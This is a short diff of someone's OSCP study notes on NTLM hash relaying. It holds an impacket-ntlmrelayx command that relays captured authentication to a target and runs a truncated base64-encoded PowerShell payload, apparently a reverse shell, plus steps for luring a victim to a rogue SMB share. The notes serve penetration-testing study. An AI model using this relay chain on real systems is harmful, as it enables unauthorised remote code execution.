HoiDam/Markdown_OSCP/Learning Modules/15-Password-Attack.md

 - Trigger call NTLM hash

 ## Forwarding the hash instill of crack since too hard
-- relay server for NTLM ``` impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..." ```
+- relay server for NTLM ``` impacket-ntlmrelayx --no-http-server -smb2support -t {target vicim ip} -c "powershell -enc JABjAGwAaQBlAG4AdA..." ```
 - use victim A to connect our rogue impacket server by dir \\xx\y
 - watch shell if have thing come